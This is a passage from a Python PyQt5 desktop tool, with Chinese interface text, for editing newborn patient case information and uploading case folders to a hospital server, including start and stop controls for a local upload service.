move_center(self):\n screen = QDesktopWidget().screenGeometry()\n form = self.geometry()\n x_move_step = (screen.width() - form.width()) / 2\n y_move_step = (screen.height() - form.height()) / 2\n self.move(x_move_step, y_move_step)\n\n\n def save_path_info(self):\n temp_dir = {\n 'pa_dir' : self._dataDir,\n 'run_time': self._runtTime,\n 'local_path':self.local,\n 'url':self._baseurl,\n }\n result = json.dumps(temp_dir)\n file1 = codecs.open(os.path.join('C:/', 'cfg.txt'), 'w')\n file1.write(result)\n file1.close()\n\n\n @pyqtSlot(QDateTime)\n def on_timeEdit_dateTimeChanged(self, dateTime):\n # self.textBrowser.append(dateTime.toString('hh:mm'))\n self._runtTime = dateTime.toString('hh:mm')\n self.save_path_info()\n\n @pyqtSlot(QTime)\n def on_timeEdit_timeChanged(self, time):\n self._runtTime = time.toString('hh:mm')\n # self.textBrowser.append('案例路径为:' + self._runtTime)\n self.save_path_info()\n\n def ManHandUpLoad(self):\n pa_info = os.path.join(self._dataDir,'PatientInfo.txt')\n if False == os.path.exists(pa_info):\n QMessageBox.critical(self, \"错误\",\n self.tr('用户选择的文件夹:{0},未包含病人信息文件:{1}'.format(self._dataDir, 'PatientInfo.txt')))\n self.statusBar.showMessage('手动上传文件失败!')\n return\n\n if False == self.Check_PatientInfo(pa_info):\n QMessageBox.critical(self, \"错误\",self.tr('案例:{0}信息不全,请点击编辑案例补充信息!'.format(pa_info)))\n self.statusBar.showMessage('手动上传文件失败!')\n return\n\n hp_id = os.path.split(self._dataDir)[1]\n # if len(hp_id) != len(def_dirname):\n # QMessageBox.critical(self, \"错误\",\n # self.tr('用户选择的文件夹:{0},文件夹命名不符合规范!请参考:{1}'.format(self._dataDir,def_dirname)))\n # self.statusBar.showMessage('手动上传文件失败!')\n # return\n\n self.statusBar.showMessage('开始上传case:%s,请稍后............' 
% os.path.split(self._dataDir)[1])\n temp_op_arry ={\n 'Pa_info':self.Pa_Info,\n 'baseurl':self._baseurl,\n 'Case_Path':self._dataDir,\n 'Force_flag':True\n }\n self.pushButton.setEnabled(False)\n self.AutoUpload.setEnabled(False)\n self.AllUpLoad.setEnabled(False)\n self.radioButton.setEnabled(False)\n self.StopService.setEnabled(False)\n self.radioButton_6.setEnabled(False)\n self.progressBar.setVisible(True)\n self.MauUpload.setEnabled(False)\n self.statusBar.showMessage('')\n self.textBrowser.clear()\n self.thread = UploadThread(op_type='manuUpLoad',input_array=temp_op_arry)\n self.thread.trigger.connect(self.update_text)\n self.thread.start()\n\n def update_text(self,result):\n if self._Flag.get('manuUpLoad'):\n if 'status' in result.keys():\n self.pushButton.setEnabled(True)\n self.AutoUpload.setEnabled(True)\n self.AllUpLoad.setEnabled(True)\n self.StopService.setEnabled(True)\n self.radioButton_6.setEnabled(True)\n self.progressBar.setVisible(False)\n self.MauUpload.setEnabled(True)\n self.radioButton.setEnabled(True)\n if UpLoadResult.Proc_Ok == result.get(\"status\"):\n self.statusBar.showMessage('案例上传成功!')\n self.textBrowser.clear()\n else:\n self.statusBar.showMessage('案例上传失败!')\n elif 'file_count' in result.keys():\n temp = result['file_count'].split(':')\n self.progressBar.setValue((int(temp[1])/int(temp[0]))*100)\n else:\n self.textBrowser.append(result.get('info'))\n elif self._Flag.get('allUpLoad'):\n if 'status' in result.keys():\n self.pushButton.setEnabled(True)\n self.AutoUpload.setEnabled(True)\n self.AllUpLoad.setEnabled(True)\n self.StopService.setEnabled(True)\n self.radioButton_6.setEnabled(True)\n self.progressBar.setVisible(False)\n self.MauUpload.setEnabled(True)\n self.radioButton.setEnabled(True)\n self.statusBar.showMessage('共%d个案例,成功插入%d个案例。'%(self.CaseCount,result.get(\"status\")))\n elif 'file_count' in result.keys():\n # self.textBrowser.append(result['file_count'])\n temp = result['file_count'].split(':')\n self.progressBar.setValue((int(temp[1]) / int(temp[0])) * 100)\n elif 'case_count' in result.keys():\n self.statusBar.showMessage('共%d个案例,已处理%d个案例' % (result[\"total_case\"],result[\"case_count\"]))\n else:\n self.textBrowser.append(result.get('info'))\n elif self._Flag.get('StartService'):\n if 'status' in result.keys():\n self.pushButton.setEnabled(True)\n self.AutoUpload.setEnabled(True)\n self.AllUpLoad.setEnabled(True)\n self.StopService.setEnabled(True)\n self.radioButton_6.setEnabled(True)\n self.MauUpload.setEnabled(True)\n self.radioButton.setEnabled(True)\n if False == result.get(\"status\"):\n QMessageBox.critical(self, \"错误\",self.tr('服务启动失败!'))\n else:\n self.textBrowser.append(result.get('info'))\n\n elif self._Flag.get('StopService'):\n if 'status' in result.keys():\n self.pushButton.setEnabled(True)\n self.AutoUpload.setEnabled(True)\n self.AllUpLoad.setEnabled(True)\n self.StopService.setEnabled(True)\n self.radioButton_6.setEnabled(True)\n self.MauUpload.setEnabled(True)\n self.radioButton.setEnabled(True)\n else:\n self.textBrowser.append(result.get('info'))\n\n elif self._Flag.get('DeleteService'):\n if 'status' in result.keys():\n self.pushButton.setEnabled(True)\n self.AutoUpload.setEnabled(True)\n self.AllUpLoad.setEnabled(True)\n self.StopService.setEnabled(True)\n self.radioButton_6.setEnabled(True)\n self.MauUpload.setEnabled(True)\n self.radioButton.setEnabled(True)\n self.radioButton_6.setEnabled(True)\n else:\n self.textBrowser.append(result.get('info'))\n\n def StartService(self):\n if 0 == 
self.Check_Case_Nub(self._dataDir):\n QMessageBox.critical(self, \"错误\", self.tr('用户选择的路径:%s中找不到任何%s文件!请检查路径配置!' % (self._dataDir, self.Pa_Info)))\n self.statusBar.showMessage('启动服务失败!')\n return\n Case_VaildList = self.Check_CaseIdByDir(self._dataDir)\n if len(Case_VaildList):\n self.textBrowser.clear()\n for temp_case in Case_VaildList:\n self.textBrowser.append('案例文件夹:%s命名不符合规范!' % temp_case)\n box = QMessageBox(QMessageBox.Warning, \"提示\", self.tr('有%d个案例命令不符合规范,是否忽视?' % len(Case_VaildList)),\n QMessageBox.NoButton, self)\n qyes = box.addButton(self.tr(\"确定\"), QMessageBox.YesRole)\n qno = box.addButton(self.tr(\"取消\"), QMessageBox.NoRole)\n box.exec_()\n if box.clickedButton() == qno:\n return\n case_count = self.Check_PainfoKey_ByDir(self._dataDir)\n if case_count:\n box = QMessageBox(QMessageBox.Warning, \"提示\", self.tr('有%d个案例信息不全,是否忽视?' % case_count), QMessageBox.NoButton,self)\n qyes = box.addButton(self.tr(\"确认\"), QMessageBox.YesRole)\n qno = box.addButton(self.tr(\"取消\"), QMessageBox.NoRole)\n box.exec_()\n if box.clickedButton() == qno:\n return\n if False == os.path.exists(os.path.join(self.local, 'hospital_service.exe')):\n QMessageBox.critical(self, \"错误\", self.tr('文件:%s不存在!' % (os.path.join(self.local, 'hospital_service.exe'))))\n self.statusBar.showMessage('启动服务失败!')\n return\n if False == os.path.exists(os.path.join(self.local, 'hospital_monitor.exe')):\n QMessageBox.critical(self, \"错误\", self.tr('文件:%s不存在!' % (os.path.join(self.local, 'hospital_monitor.exe'))))\n self.statusBar.showMessage('启动服务失败!')\n return\n self.statusBar.showMessage('')\n self.pushButton.setEnabled(False)\n self.AutoUpload.setEnabled(False)\n self.AllUpLoad.setEnabled(False)\n self.StopService.setEnabled(False)\n self.radioButton_6.setEnabled(False)\n self.MauUpload.setEnabled(False)\n self.radioButton.setEnabled(False)\n self.thread = UploadThread(op_type='StartService')\n self.thread.trigger.connect(self.update_text)\n self.thread.start()\n return\n\n def StopService_Temp(self):\n if False == os.path.exists(os.path.join(self.local, 'hospital_service.exe')):\n QMessageBox.critical(self, \"错误\", self.tr('文件:%s不存在!' % (os.path.join(self.local, 'hospital_service.exe'))))\n self.statusBar.showMessage('启动服务失败!')\n return\n if False == os.path.exists(os.path.join(self.local, 'hospital_monitor.exe')):\n QMessageBox.critical(self, \"错误\", self.tr('文件:%s不存在!' % (os.path.join(self.local, 'hospital_monitor.exe'))))\n self.statusBar.showMessage('启动服务失败!')\n return\n self.statusBar.showMessage('')\n self.pushButton.setEnabled(False)\n self.AutoUpload.setEnabled(False)\n self.AllUpLoad.setEnabled(False)\n self.StopService.setEnabled(False)\n self.radioButton_6.setEnabled(False)\n self.MauUpload.setEnabled(False)\n self.radioButton.setEnabled(False)\n self.thread = UploadThread(op_type='StopService')\n self.thread.trigger.connect(self.update_text)\n self.thread.start()\n\n def DeleteService_Temp(self):\n if False == os.path.exists(os.path.join(self.local, 'hospital_service.exe')):\n QMessageBox.critical(self, \"错误\", self.tr('文件:%s不存在!' % (os.path.join(self.local, 'hospital_service.exe'))))\n self.statusBar.showMessage('启动服务失败!')\n return\n if False == os.path.exists(os.path.join(self.local, 'hospital_monitor.exe')):\n QMessageBox.critical(self, \"错误\", self.tr('文件:%s不存在!' 
% (os.path.join(self.local, 'hospital_monitor.exe'))))\n self.statusBar.showMessage('启动服务失败!')\n return\n self.statusBar.showMessage('')\n self.pushButton.setEnabled(False)\n self.AutoUpload.setEnabled(False)\n self.AllUpLoad.setEnabled(False)\n self.StopService.setEnabled(False)\n self.MauUpload.setEnabled(False)\n self.radioButton.setEnabled(False)\n self.thread = UploadThread(op_type='DeleteService')\n self.thread.trigger.connect(self.update_text)\n self.thread.start()\n\n def AllUpLoadProc(self):\n Case_Nub = self.Check_Case_Nub(self._dataDir)\n self.CaseCount = Case_Nub\n if 0 == Case_Nub:\n QMessageBox.critical(self, \"错误\", self.tr('用户选择的路径:%s中找不到任何%s文件!' % (self._dataDir,self.Pa_Info)))\n self.statusBar.showMessage('全部上传失败!')\n return\n Case_VaildList=self.Check_CaseIdByDir(self._dataDir)\n if len(Case_VaildList):\n self.textBrowser.clear()\n for temp_case in Case_VaildList:\n self.textBrowser.append('案例文件夹:%s命名不符合规范!'%temp_case)\n box = QMessageBox(QMessageBox.Warning, \"提示\", self.tr('有%d个案例命令不符合规范,是否忽视?' % len(Case_VaildList)), QMessageBox.NoButton,self)\n qyes = box.addButton(self.tr(\"确定\"), QMessageBox.YesRole)\n qno = box.addButton(self.tr(\"取消\"), QMessageBox.NoRole)\n box.exec_()\n if box.clickedButton() == qno:\n return\n temp_count = self.Check_PainfoKey_ByDir(self._dataDir)\n if temp_count:\n box = QMessageBox(QMessageBox.Warning, \"提示\", self.tr('有%d个案例信息不全,是否忽视?' % temp_count),QMessageBox.NoButton, self)\n qyes = box.addButton(self.tr(\"确定\"), QMessageBox.YesRole)\n qno = box.addButton(self.tr(\"取消\"), QMessageBox.NoRole)\n box.exec_()\n if box.clickedButton() == qno:\n return\n temp_op_arry = {\n 'Pa_info': self.Pa_Info,\n 'baseurl': self._baseurl,\n 'Case_Path': self._dataDir,\n 'Force_flag': True\n }\n self.pushButton.setEnabled(False)\n self.AutoUpload.setEnabled(False)\n self.AllUpLoad.setEnabled(False)\n self.StopService.setEnabled(False)\n self.radioButton_6.setEnabled(False)\n self.MauUpload.setEnabled(False)\n self.radioButton.setEnabled(False)\n self.progressBar.setVisible(True)\n self.statusBar.showMessage('')\n self.textBrowser.clear()\n self.thread = UploadThread(op_type='allUpLoad', input_array=temp_op_arry)\n self.thread.trigger.connect(self.update_text)\n self.thread.start()\n\n # for hp_temp in os.listdir(self._dataDir):\n # temp_path = os.path.join(self._dataDir, hp_temp)\n # if os.path.isdir(temp_path):\n # self.textBrowser.append('开始上传case:%s,请稍后............' % hp_temp)\n # result = self.UpLoad_Case(self.Pa_Info, self._baseurl, temp_path, True)\n #\n # self.UpLoad_Case_Nub = self.UpLoad_Case_Nub + int(result)\n # self.textBrowser.append('case:%s,上传结束!............' % hp_temp)\n # QMessageBox.information(self, \"提示\", self.tr(\"用户数据上传完成,共上传%d个数据\" % self.UpLoad_Case_Nub))\n # self.statusBar.showMessage('共计%d个案例,成功上传%d个案例!' 
% (Case_Nub, self.UpLoad_Case_Nub))\n\n def Init_EditCase(self,CasePaInfoPath):\n self.textBrowser.append('正在编辑' + CasePaInfoPath)\n PaInfo ={}\n self.SaveInfo.clear()\n self.lineEdit.setText('')\n self.lineEdit_2.setText('')\n self.lineEdit_3.setText('')\n self.lineEdit_4.setText('')\n self.lineEdit_5.setText('')\n self.lineEdit_11.setText('')\n self.lineEdit_6.setText('')\n self.lineEdit_15.setText('')\n self.lineEdit_20.setText('')\n self.lineEdit_21.setText('')\n self.lineEdit_22.setText('')\n self.lineEdit_24.setText('')\n self.lineEdit_25.setText('')\n self.textEdit.setText('')\n self.lineEdit_5.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n self.lineEdit_3.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n self.lineEdit.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n self.lineEdit_6.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n self.lineEdit_15.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n self.lineEdit_20.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n self.lineEdit_24.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n self.lineEdit_7.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n\n self.Read_PatientInfo(PaInfo,CasePaInfoPath,self.SaveInfo)\n # print(PaInfo)\n Key_arry = []\n Key_arry = PaInfo.keys()\n if 'Name' in Key_arry:\n self.lineEdit_5.setText(PaInfo.get('Name'))\n if 'Birthdate' in Key_arry:\n self.lineEdit_6.setText(PaInfo.get('Birthdate'))\n if 'ClinicDate' in Key_arry and 'ClinicTime' in Key_arry:\n self.lineEdit_19.setText(PaInfo.get('ClinicDate')+' '+PaInfo.get('ClinicTime'))\n self.lineEdit_19.setEnabled(False)\n # self.lineEdit_7.setText(PaInfo.get('Gender'))\n # self.lineEdit_7.setEnabled(False)\n if 'GA'in Key_arry:\n self.lineEdit_20.setText(PaInfo.get('GA'))\n if 'BirthWeight' in Key_arry:\n self.lineEdit_15.setText(PaInfo.get('BirthWeight'))\n if 'Phone' in Key_arry:\n self.lineEdit_3.setText(PaInfo.get('Phone'))\n if 'CorrectGA' in Key_arry:\n self.lineEdit_21.setText(PaInfo.get('CorrectGA'))\n if 'Gender' in Key_arry:\n if PaInfo.get('Gender') in ['男','女']:\n self.comboBox.setCurrentText( PaInfo.get('Gender'))\n if 'LitterIndex' in PaInfo.keys():\n if len(PaInfo.get('LitterIndex')) > 0:\n temp_str_index = PaInfo.get('LitterIndex').split()[0]\n if temp_str_index in ['单', '双','三','四','其他']:\n self.comboBox_2.setCurrentText(temp_str_index)\n temp_str = PaInfo.get('LitterIndex')\n if '双' in PaInfo.get('LitterIndex'):\n self.groupBox_4.setVisible(True)\n if '2-2' in temp_str:\n self.radioButton_3.setChecked(True)\n elif '三' in PaInfo.get('LitterIndex'):\n self.groupBox_4.setVisible(True)\n if '3-2' in temp_str:\n self.radioButton_3.setChecked(True)\n elif '3-3' in temp_str:\n self.radioButton_4.setChecked(True)\n elif '四' in PaInfo.get('LitterIndex'):\n self.groupBox_4.setVisible(True)\n if '4-2' in temp_str:\n self.radioButton_3.setChecked(True)\n elif '4-3' in temp_str:\n self.radioButton_4.setChecked(True)\n elif '4-4' in temp_str:\n self.radioButton_5.setChecked(True)\n if 'MatherName' in Key_arry:\n self.lineEdit.setText(PaInfo.get('MatherName'))\n if 'MatherID' in Key_arry:\n self.lineEdit_2.setText(PaInfo.get('MatherID'))\n if 'Home Address' in Key_arry:\n self.lineEdit_4.setText(PaInfo.get('Home Address'))\n if 'SelfId' in Key_arry:\n self.lineEdit_11.setText(PaInfo.get('SelfId'))\n if 'Pregnancy' in Key_arry:\n if PaInfo.get('Pregnancy') in ['引导产', '剖腹产']:\n self.comboBox_3.setCurrentText(PaInfo.get('Pregnancy'))\n if 'Oxygen' in Key_arry:\n if len(PaInfo.get('Oxygen')) > 0:\n if 
PaInfo.get('Oxygen') in ['是', '否']:\n self.comboBox_4.setCurrentText(PaInfo.get('Oxygen'))\n # self.comboBox.setCurrentText('女')\n if 'BirthHospital' in Key_arry:\n self.lineEdit_22.setText(PaInfo.get('BirthHospital'))\n if 'PhotoID' in Key_arry:\n self.lineEdit_12.setText(PaInfo.get('PhotoID'))\n if 'VisitID' in Key_arry:\n self.lineEdit_24.setText(PaInfo.get('VisitID'))\n if 'HospitalNum' in Key_arry:\n self.lineEdit_7.setText(PaInfo.get('HospitalNum'))\n if 'NativePlace' in Key_arry:\n self.lineEdit_25.setText(PaInfo.get('Native Place'))\n if 'Disease' in Key_arry:\n self.textEdit.setText(PaInfo.get('Disease'))\n if 'Other' in Key_arry:\n self.lineEdit_8.setText(PaInfo.get('Other'))\n\n def Save_CaseInfo(self,SaveInfoDict,Key,KeyName,Value):\n #空字典\n if SaveInfoDict == {}:\n self.my_print('error! Dict is null!')\n SaveInfoDict[KeyName] = Value\n return\n if isinstance(SaveInfoDict,dict):\n for temp_key in SaveInfoDict.keys():\n if Key in temp_key:\n SaveInfoDict[temp_key] = Value\n return\n SaveInfoDict[KeyName] = Value\n\n def Get_EditCase(self):\n self.Save_CaseInfo(self.SaveInfo, '母亲姓名(Mather Name)', '母亲姓名(Mather Name)', self.lineEdit.text())\n self.Save_CaseInfo(self.SaveInfo, '母亲身份证号(Mather ID)', '母亲身份证号(Mather ID)', self.lineEdit_2.text())\n self.Save_CaseInfo(self.SaveInfo, '患者电话(Phone)','患者电话(Phone)',self.lineEdit_3.text())\n self.Save_CaseInfo(self.SaveInfo, '家庭地址(Home Address)', '家庭地址(Home Address)', self.lineEdit_4.text())\n self.Save_CaseInfo(self.SaveInfo, '患者姓名(Name)', '患者姓名(Name)', self.lineEdit_5.text())\n self.Save_CaseInfo(self.SaveInfo, '身份证号(Self Id)', '身份证号(Self Id)', self.lineEdit_11.text())\n self.Save_CaseInfo(self.SaveInfo, '出生日期(Birthdate)', '出生日期(Birthdate)', self.lineEdit_6.text())\n self.Save_CaseInfo(self.SaveInfo, '患者性别(Gender)', '患者性别(Gender)', self.comboBox.currentText())\n Litter_result = ''\n if '单' in self.comboBox_2.currentText() or '其他' in self.comboBox_2.currentText():\n # self.SaveInfo['胎数(Litter Index)'] =2 self.comboBox_2.currentText()\n Litter_result = self.comboBox_2.currentText()\n elif '双' in self.comboBox_2.currentText():\n if self.radioButton_2.isChecked():\n Litter_result = '双 2-1'\n elif self.radioButton_3.isChecked():\n Litter_result = '双 2-2'\n elif '三' in self.comboBox_2.currentText():\n if self.radioButton_2.isChecked():\n Litter_result = '三 3-1'\n elif self.radioButton_3.isChecked():\n Litter_result = '三 3-2'\n elif self.radioButton_4.isChecked():\n Litter_result = '三 3-3'\n elif '四' in self.comboBox_2.currentText():\n if self.radioButton_2.isChecked():\n Litter_result = '四 4-1'\n elif self.radioButton_3.isChecked():\n Litter_result = '四 4-2'\n elif self.radioButton_4.isChecked():\n Litter_result = '四 4-3'\n elif self.radioButton_5.isChecked():\n Litter_result = '四 4-4'\n self.Save_CaseInfo(self.SaveInfo, '胎数(Litter Index)', '胎数(Litter Index)', Litter_result)\n self.Save_CaseInfo(self.SaveInfo, '出生体重(kg)(BirthWeight)', '出生体重(kg)(BirthWeight)', self.lineEdit_15.text())\n self.Save_CaseInfo(self.SaveInfo, '出生胎龄(周)(GA)', '出生胎龄(周)(GA)', self.lineEdit_20.text())\n self.Save_CaseInfo(self.SaveInfo, '矫正胎龄(周)(Correct GA)', '矫正胎龄(周)(Correct GA)', self.lineEdit_21.text())\n self.Save_CaseInfo(self.SaveInfo, '生产方式(Pregnancy', '生产方式(Pregnancy)', self.comboBox_3.currentText())\n self.Save_CaseInfo(self.SaveInfo, '吸氧史(Oxygen)', '吸氧史(Oxygen)', self.comboBox_4.currentText())\n self.Save_CaseInfo(self.SaveInfo, '家族病史(Disease)', '家族病史(Disease)', self.textEdit.toPlainText())\n self.Save_CaseInfo(self.SaveInfo, '出生医院(Birth Hospital)', '出生医院(Birth 
Hospital)', self.lineEdit_22.text())\n self.Save_CaseInfo(self.SaveInfo, '检查日期(ClinicDate)', '检查日期(ClinicDate)', self.lineEdit_22.text())\n self.Save_CaseInfo(self.SaveInfo, '照片编号(Photo ID)', '照片编号(Photo ID)', self.lineEdit_12.text())\n self.Save_CaseInfo(self.SaveInfo, '就诊号(Visit ID)', '就诊号(Visit ID)', self.lineEdit_24.text())\n self.Save_CaseInfo(self.SaveInfo, '住院号(HospitalNum)', '住院号(HospitalNum)', self.lineEdit_7.text())\n self.Save_CaseInfo(self.SaveInfo, '籍贯(Native Place)', '籍贯(Native Place)', self.lineEdit_25.text())\n self.Save_CaseInfo(self.SaveInfo, '其他(Other)', '其他(Other)', self.lineEdit_8.text())\n self.my_print(self.lineEdit_5.text())\n if 0 == len(self.lineEdit_5.text()):\n tmp_str = '女'\n nub_str = ' '\n if self.comboBox.currentText() in ['男']:\n tmp_str = '子'\n if len(self.SaveInfo['胎数(Litter Index)'].split(' ')) > 1:\n nub_str = self.SaveInfo['胎数(Litter Index)'].split(' ')[1]\n self.Save_CaseInfo(self.SaveInfo, '患者姓名(Name)', '患者姓名(Name)','{0} {1} {2}'.format(self.lineEdit.text(), tmp_str, nub_str))\n # self.SaveInfo = sorted(self.SaveInfo.items(), key=lambda item: item[0])\n self.my_print(self.SaveInfo)\n\n #3 5 6 15 20 0\n def Check_EditCase(self):\n result = True\n if 0 == len(self.lineEdit_3.text()):\n self.lineEdit_3.setStyleSheet(\"background-color:rgb(255, 170, 255)\")\n result = False\n # if 0 == len(self.lineEdit_5.text()):\n # # self.lineEdit_5.setStyleSheet(\"background-color:rgb(255, 170, 255)\")\n #\n # self.lineEdit_5.setText()\n # result = False\n if 0 == len(self.lineEdit.text()):\n self.lineEdit.setStyleSheet(\"background-color:rgb(255, 170, 255)\")\n result = False\n if 0 == len(self.lineEdit_6.text()):\n self.lineEdit_6.setStyleSheet(\"background-color:rgb(255, 170, 255)\")\n result = False\n if 0 == len(self.lineEdit_15.text()):\n self.lineEdit_15.setStyleSheet(\"background-color:rgb(255, 170, 255)\")\n result = False\n if 0 == len(self.lineEdit_20.text()):\n self.lineEdit_20.setStyleSheet(\"background-color:rgb(255, 170, 255)\")\n result = False\n if 0 == len(self.lineEdit_24.text()) and 0 == len(self.lineEdit_7.text()):\n if 0 == len(self.lineEdit_24.text()) :\n self.lineEdit_24.setStyleSheet(\"background-color:rgb(255, 170, 255)\")\n if 0 == len(self.lineEdit_7.text()) :\n self.lineEdit_7.setStyleSheet(\"background-color:rgb(255, 170, 255)\")\n result = False\n return result\n\n def Save_Case(self):\n #self.SaveInfo.clear()\n self.Get_EditCase()\n #将字典进行排序处理\n # self.my_print('保存结果!')\n result = self.ResortDict(self.SaveInfo)\n # self.my_print(result)\n try:\n temp_file = open(self.Pa_Info_Current_Path, \"w\", encoding='utf_8')\n for temp_key in result:\n temp_file.writelines(\"%s\\n\"%temp_key)\n temp_file.close()\n self.Pa_Info_current_index = self.Pa_Info_current_index + 1\n # recode_path =os.path.split(self.Pa_Info_Current_Path)[0]\n # recode_file_name =os.path.join(recode_path,'check_flag')\n # recode_file = open(recode_file_name, \"w\", encoding='utf_8')\n # temp_file.close()\n return True\n except:\n return False\n\n\n def ProcEditCase(self):\n self.Pa_Info_current_index = 0\n self.CaseCount = self.Check_Case_Nub(self._dataDir)\n if 0 == self.CaseCount:\n QMessageBox.critical(self, \"错误\", self.tr('用户选择的路径:%s中找不到任何%s文件!' 
% (self._dataDir, self.Pa_Info)))\n self.statusBar.showMessage('请确认是否选择案例主目录文件夹路径!')\n return\n self.Pa_Info_path_arry = self.Get_PaInfo_Path(self._dataDir)\n if len(self.Pa_Info_path_arry) == 0:\n QMessageBox.critical(self, \"错误\", self.tr('用户选择的路径:%s中无信息不全的案例!'% (self._dataDir)))\n return\n self.setFixedSize(1060,500)\n self.pushButton.setVisible(False)\n self.pushButton_2.setVisible(False)\n self.pushButton_4.setVisible(True)\n self.pushButton_5.setVisible(True)\n self.pushButton.setEnabled(False)\n self.AutoUpload.setEnabled(False)\n self.AllUpLoad.setEnabled(False)\n self.StopService.setEnabled(False)\n self.radioButton_6.setEnabled(False)\n self.MauUpload.setEnabled(False)\n self.progressBar.setVisible(False)\n self.statusBar.showMessage('共计%d个案例需要编辑。'%len(self.Pa_Info_path_arry))\n self.Pa_Info_Current_Path = self.Pa_Info_path_arry[0]\n self.Init_EditCase(self.Pa_Info_Current_Path)\n if len(self.Pa_Info_path_arry) == 1 :\n self.pushButton_4.setEnabled(False)\n else:\n self.pushButton_4.setEnabled(True)\n self.pushButton_5.setEnabled(False)\n\n #手动进行上传操作\n @pyqtSlot()\n def on_MauUpload_clicked(self):\n for (key, value) in self._Flag.items():\n self._Flag[key]=False\n self._Flag['manuUpLoad'] = True\n self.timeEdit.setEnabled(False)\n\n @pyqtSlot()\n def on_AutoUpload_clicked(self):\n for (key, value) in self._Flag.items():\n self._Flag[key] = False\n self._Flag['StartService'] = True\n self.timeEdit.setEnabled(True)\n\n @pyqtSlot()\n def on_AllUpLoad_clicked(self):\n for (key, value) in self._Flag.items():\n self._Flag[key]=False\n self._Flag['allUpLoad'] = True\n self.timeEdit.setEnabled(False)\n\n @pyqtSlot()\n def on_StopService_clicked(self):\n for (key, value) in self._Flag.items():\n self._Flag[key] = False\n self._Flag['StopService'] =True\n self.timeEdit.setEnabled(False)\n\n @pyqtSlot()\n #退出按钮\n def on_pushButton_2_clicked(self):\n sys.exit(app.exec_())\n\n @pyqtSlot()\n #确认按钮\n def on_pushButton_clicked(self):\n if self._Flag.get('StopService'):\n self.StopService_Temp()\n elif self._Flag.get('allUpLoad'):\n self.AllUpLoadProc()\n elif self._Flag.get('manuUpLoad'):\n self.ManHandUpLoad()\n elif self._Flag.get('StartService'):\n self.StartService()\n elif self._Flag.get('DeleteService'):\n self.DeleteService_Temp()\n elif self._Flag.get('EditCase'):\n self.ProcEditCase()\n\n @pyqtSlot()\n # 用户案例按钮\n def on_pushButton_3_clicked(self):\n self._dataDir = QFileDialog.getExistingDirectory(self, \"选取文件夹\") # 起始路径\n self.textBrowser.append('案例路径为:' + self._dataDir)\n self.save_path_info()\n self.statusBar.showMessage('用户选择的案例路径为:%s' % self._dataDir)\n self.setFixedSize(441, 484)\n self.pushButton.setVisible(True)\n self.pushButton_2.setVisible(True)\n self.pushButton_4.setVisible(False)\n self.pushButton_5.setVisible(False)\n self.pushButton.setEnabled(True)\n self.AutoUpload.setEnabled(True)\n self.AllUpLoad.setEnabled(True)\n self.StopService.setEnabled(True)\n self.MauUpload.setEnabled(True)\n self.Pa_Info_current_index = 0\n\n @pyqtSlot()\n def on_radioButton_clicked(self):\n for (key, value) in self._Flag.items():\n self._Flag[key] = False\n self._Flag['EditCase'] = True\n self.timeEdit.setEnabled(False)\n\n @pyqtSlot()\n def on_radioButton_6_clicked(self):\n for (key, value) in self._Flag.items():\n self._Flag[key] = False\n self._Flag['DeleteService'] = True\n self.timeEdit.setEnabled(False)\n\n @pyqtSlot()\n #完成按钮\n def on_pushButton_5_clicked(self):\n if self.Pa_Info_current_index == len(self.Pa_Info_path_arry)-1:\n if True == self.Check_EditCase():\n if 
self.Save_Case():\n self.setFixedSize(441, 484)\n self.pushButton.setVisible(True)\n self.pushButton_2.setVisible(True)\n self.pushButton_4.setVisible(False)\n self.pushButton_5.setVisible(False)\n self.pushButton.setEnabled(True)\n self.AutoUpload.setEnabled(True)\n self.AllUpLoad.setEnabled(True)\n self.StopService.setEnabled(True)\n self.MauUpload.setEnabled(True)\n else:\n self.statusBar.showMessage('保存信息到:%s失败!'%self.Pa_Info_Current_Path)\n\n\n def eventFilter(self, obj, event):\n if event.type() == QEvent.FocusIn:\n if obj == self.lineEdit_5:\n self.statusBar.showMessage('如果新生儿没取名字,可输入XXX子或XXX女')\n # self.lineEdit_5.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n elif obj == self.lineEdit_3:\n self.statusBar.showMessage('联系电话必填!')\n self.lineEdit_3.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n elif obj == self.lineEdit:\n self.statusBar.showMessage('母亲姓名必填!')\n self.lineEdit.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n elif obj == self.lineEdit_6:\n self.statusBar.showMessage('出生日期必填!')\n self.lineEdit_6.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n elif obj == self.lineEdit_15:\n self.statusBar.showMessage('出生体重必填!')\n self.lineEdit_15.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n elif obj == self.lineEdit_20:\n self.statusBar.showMessage('出生胎龄必填!')\n self.lineEdit_20.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n elif obj == self.lineEdit_24:\n self.statusBar.showMessage('住院号与就诊号不能同时为空!')\n self.lineEdit_24.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n elif obj == self.lineEdit_7:\n self.statusBar.showMessage('住院号与就诊号不能同时为空!')\n self.lineEdit_7.setStyleSheet(\"background-color:rgb(255, 255, 255)\")\n elif event.type() == QEvent.FocusOut:\n self.statusBar.showMessage('')\n else:\n pass\n return False\n\n @pyqtSlot()\n # 下一步按钮\n def on_pushButton_4_clicked(self):\n if self.Pa_Info_current_index < len(self.Pa_Info_path_arry) - 1:\n # print(self.Pa_Info_current_index)\n if True == self.Check_EditCase():\n self.statusBar.showMessage(\n '共%d个案例,正在处理第%d个案例' % (len(self.Pa_Info_path_arry), self.Pa_Info_current_index + 2))\n if self.Save_Case():\n self.Pa_Info_Current_Path = self.Pa_Info_path_arry[self.Pa_Info_current_index]\n self.Init_EditCase(self.Pa_Info_Current_Path)\n if self.Pa_Info_current_index == len(self.Pa_Info_path_arry) - 1:\n self.pushButton_4.setEnabled(False)\n self.pushButton_5.setEnabled(True)\n\n else:\n if 0 == self.Pa_Info_current_index:\n self.statusBar.showMessage('共%d个案例,正在处理第%d个案例' % (len(self.Pa_Info_path_arry), 1))\n # self.setFixedSize(441, 484)\n # self.pushButton.setVisible(True)\n # self.pushButton_2.setVisible(True)\n # 